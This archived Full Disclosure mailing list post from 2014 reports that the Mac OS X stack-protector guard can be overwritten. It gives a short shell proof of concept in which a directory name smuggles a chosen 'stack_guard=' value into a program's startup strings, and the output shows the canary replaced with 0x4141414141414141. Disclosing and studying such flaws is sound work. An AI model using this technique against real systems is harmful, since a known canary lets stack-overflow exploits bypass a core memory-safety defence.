Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Mac OS X stack_chk_guard not always safe from overwrite

From: rai () openmailbox org
Date: Thu, 15 May 2014 13:53:32 +0000
 

Hi,

$ sysctl kern.version
kern.version: Darwin Kernel Version 13.1.0: Wed Apr 2 23:52:02 PDT 2014;
root:xnu-2422.92.1~2/RELEASE_X86_64

$ mkdir stack_guard=0x4141414141414141
$ ln -sf ../appledump stack_guard=0x4141414141414141/link
$ stack_guard=0x4141414141414141/link
string(0):
string(1):
string(2): stack_guard=0x7600c0a70d1184c5
string(3):

__stack_chk_guard: 4141414141414141

</bash>

source: http://maker.fea.st/appledump.c

All credit due to the anon pastebin poster.

--
rai

 

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: